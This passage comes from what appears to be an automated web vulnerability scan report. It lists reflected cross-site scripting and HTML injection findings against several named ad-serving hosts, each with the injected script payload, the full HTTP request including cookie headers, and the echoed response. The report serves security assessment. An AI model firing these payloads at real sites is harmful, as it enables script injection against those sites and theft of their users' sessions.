The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2f4"><script>alert(1)</script>fe7203a0cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a3c"><script>alert(1)</script>9ea027e7c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3700"><script>alert(1)</script>c1d53990b82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafad"><script>alert(1)</script>58e3214e0d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64130"><script>alert(1)</script>4aff41005f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bda"><script>alert(1)</script>f0041c3072b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd55"><script>alert(1)</script>94b70172a07 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c48c"><script>alert(1)</script>9172a92def1 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1;adiframe=y">
...[SNIP]...

3.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd538"><script>alert(1)</script>254bcc5e869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1;adiframe=y">
...[SNIP]...

3.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30ced"-alert(1)-"bb2604ed03b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=967562&30ced"-alert(1)-"bb2604ed03b=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 01:37:35 GMT
Pragma: no-cache
Content-Length: 4332
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?30ced"-alert(1)-"bb2604ed03b=1&Z=728x90&s=967562&_salt=1387362591";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

3.71. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 174ca<a>5a3271b9808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css174ca<a>5a3271b9808/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:29 GMT
Content-Length: 7756
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> css174ca<a>5a3271b9808 ie6.css</em>
...[SNIP]...

3.72. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed684"><a>a8da4324bd0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cssed684"><a>a8da4324bd0/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:28 GMT
Content-Length: 7762
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" cssed684"><a>a8da4324bd0 ie6.css" />
...[SNIP]...

3.73. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e344"><a>5df5c5f863a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie6.css4e344"><a>5df5c5f863a HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:32 GMT
Content-Length: 17486
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie6.css4e344"><a>5df5c5f863a" />
...[SNIP]...

3.74. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 445a4<a>bf5996418af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css445a4<a>bf5996418af/ie7.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:29 GMT
Content-Length: 7756
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> css445a4<a>bf5996418af ie7.css</em>
...[SNIP]...

3.75. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9344c"><a>2d187bf6a6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css9344c"><a>2d187bf6a6d/ie7.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:27 GMT
Content-Length: 7762
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css9344c"><a>2d187bf6a6d ie7.css" />
...[SNIP]...

3.76. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba29e"><a>ba8c2e9bbf8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie7.cssba29e"><a>ba8c2e9bbf8 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:33 GMT
Content-Length: 17486
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie7.cssba29e"><a>ba8c2e9bbf8" />
...[SNIP]...

3.77. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bbcb7<a>9b344e13caa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-cssbbcb7<a>9b344e13caa/screen-optimized.css?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
